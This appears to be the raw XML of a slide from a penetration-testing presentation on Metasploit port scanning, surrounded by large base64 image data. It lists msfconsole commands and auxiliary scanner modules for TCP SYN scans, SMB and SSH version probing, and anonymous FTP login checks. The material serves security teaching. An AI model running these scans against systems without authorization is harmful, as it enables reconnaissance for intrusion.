AAdgFNNg7DTDRBEHeSeLNzZvy5VK1yzn2Z2ccOqCiiiplAooooAKKKKACiiigBltTZSTxskihlPEfIg8iO2sm3n3TkwbZtXhJ0e3DsVxyPfwPwrZqTnw6uCGAIIsQRcEHkQeIp4TcSc+NSPn7PRnq+7z+jU6yYTxMJP8A9bH+U+fKs+njZGKupVhoVYEEHvBrrjJS0ccouOxTPRnpvno6SmEsXJpJ4ga56SjpKAEJdnKeIHlTdtjp7Ip/0lGetsWkR3+jJ2UomylHIeVPc9HSUWFITTBgUusYFcZ6OkoNwLhq9z03z0dJWG2OM9GekFJJAAJJ0AAuSewDnV53Z9G8klnxV0TiIxpI34j+oPj4UspKOxoxctEHu/u9LjHsgsgPXkI6q937Tdw+HGtb2HsCPCxhEHeSfWY+0x+nKneCwCRIERQqqLBVFgP87ac1yzm5HZDjUQoooqZUKKKKACiiigAooooAKKKKACiiigDwiovbW7MGLW00YYjgw0dfwuNfdwqVorU6MavZk23PRXNHdsMwlX2Gskg9/qt8PCqVjMLJC2WVGRvZdSp91+NfR1N8XgI5VyyIrr7LqGHkatHma2QlwJ6PnPpKOkrZNo+i3By6qrwn/wBt9P8Ape48rVW8b6GnH6LEqe6SMr/EpPyqy5Ysg+GaM/6SjpKtOI9FWOXgsT/hlt/OFpm/o52gP/LE+EsR/rpu8fsn0n9EF0lHSVOr6OtoH/yxHjLEP66dQei3HtxSNPxTL/Rmo7x+w6S+isdJR0lX3B+huU/pcTGvciM582y1YtneifCR2MnSTH9t8q/9KW+JNK+WKHXDNmRwRs7BUVmY8FVSzHwA1q4bE9GOJmsZrQJ2HrSHwQGw95HhWrYDZMUC5YY0jXsRQt/G3H306AqMuZvReP46WyD2Dufh8ILxpd+cj9aQ+B4KO4WqcAr2iott7OhJLQUUUVhoUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQB5XtFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAf/Z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97672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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> port scanning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7975" y="1143000"/>
            <a:ext cx="8181974" cy="5029200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MSF Axillary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Portscanners</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>portscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (shows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>portscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> modules)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>portscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (runs a TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Use auxiliary modules like exploits (use, set, exploit, etc.)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	scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb_version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (scans port 445 for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> version, 	good way to get OS version)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	scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh_version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (queries the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> version)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	scanner/ftp/anonymous (anonymous ftp login)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,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